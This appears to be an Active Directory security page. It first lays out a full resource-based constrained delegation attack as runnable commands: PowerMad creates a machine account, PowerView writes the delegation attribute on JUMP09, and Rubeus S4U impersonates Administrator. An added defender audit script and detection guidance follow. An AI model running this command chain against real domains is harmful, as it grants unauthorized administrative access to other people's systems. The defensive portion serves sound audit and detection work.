Example attack

Create machine using PowerMad

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

Get SID of created machine

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

Build the raw security descriptor bytes. Replace the SID in the SDDL string with the one retrieved in the previous step ($ComputerSid); the ACE rights string (CCDCLCSWRPWPDTLOCRSDRCWDWO) is static and does not change.

$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2032401531-514583578-4118054891-6101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

In this example we have GenericWrite on JUMP09; let's abuse that right to write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute that RBCD requires.

Get-DomainComputer JUMP09 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Generate password hash using Rubeus (make sure to use same password as before)

.\Rubeus.exe hash /password:Summer2018!

rc4_hmac             : EF266C6B963C0BB683941032008AD47F

If hash generation fails, try a different version or bitness (x86/x64) of Rubeus.

Generate the ticket!

.\Rubeus.exe s4u /user:attackersystem$ /domain:ops.comply.com /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:http/jump09 /altservice:cifs,host /ptt /nowrap

Test if successful

dir \\jump09\c$
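The chain above depends on two configuration weaknesses (a non-zero machine account quota and writable msDS-AllowedToActOnBehalfOfOtherIdentity on the target) and leaves a durable artifact in the directory. The following audit script is an added example for defenders and is not from the original page or from PowerMad/Rubeus. It assumes the RSAT ActiveDirectory module is installed and that the caller can read the domain; $KnownDelegations is a hypothetical allow-list you fill in from your own delegation records.

```powershell
# Added defender audit (not from the original walkthrough). Reports:
#  1. ms-DS-MachineAccountQuota, the setting New-MachineAccount relies on,
#  2. computer accounts created recently (attacker machines are usually new),
#  3. every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated,
#     with the trustees decoded and compared against a documented allow-list.
# Assumes the RSAT ActiveDirectory module; $KnownDelegations is hypothetical.
Import-Module ActiveDirectory

# Hypothetical allow-list: target DN -> DNs of principals allowed to delegate to it.
$KnownDelegations = @{
    # 'CN=WEB01,OU=Servers,DC=ops,DC=comply,DC=com' = @('CN=SQL01,OU=Servers,DC=ops,DC=comply,DC=com')
}

$domain = Get-ADDomain

# 1. Machine account quota: any value above 0 lets ordinary authenticated users
#    add computer objects, which is exactly what the PowerMad step needs.
$quotaObj = Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota'
$quota = $quotaObj.'ms-DS-MachineAccountQuota'
if ($quota -gt 0) {
    Write-Warning "ms-DS-MachineAccountQuota is $quota; set it to 0 so users cannot create computer accounts."
}

# 2. Recently created computer accounts: reconcile these against inventory.
$cutoff = (Get-Date).AddDays(-7)
Get-ADComputer -Filter * -Properties whenCreated |
    Where-Object { $_.whenCreated -ge $cutoff } |
    ForEach-Object {
        Write-Output ("New computer account: {0} (created {1})" -f $_.SamAccountName, $_.whenCreated)
    }

# 3. Computers with RBCD configured. PrincipalsAllowedToDelegateToAccount is the
#    module's decoded view of the same security descriptor the walkthrough writes
#    with Set-DomainObject, so each entry is a trustee that can impersonate users
#    to this host.
$rbcdTargets = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties PrincipalsAllowedToDelegateToAccount

foreach ($target in $rbcdTargets) {
    $expected = $KnownDelegations[$target.DistinguishedName]
    foreach ($principal in $target.PrincipalsAllowedToDelegateToAccount) {
        $principalDn = "$principal"   # ADPrincipal renders as its distinguished name
        $status = if ($expected -and ($expected -contains $principalDn)) { 'documented' } else { 'UNEXPECTED' }
        Write-Output ("{0,-10} {1} may act on behalf of other identities to {2}" -f $status, $principalDn, $target.DistinguishedName)
    }
}
```

Run it on a schedule and treat any UNEXPECTED line, especially one naming a freshly created computer account, as a high-priority finding; clearing the attribute (Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null) removes the persistence. For real-time detection, enable directory service change auditing so that writes to msDS-AllowedToActOnBehalfOfOtherIdentity produce event ID 5136 and computer account creation produces event ID 4741. Adding privileged accounts to the Protected Users group, or marking them "Account is sensitive and cannot be delegated", prevents their identity from being impersonated through S4U even when a delegation entry like the one above exists.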
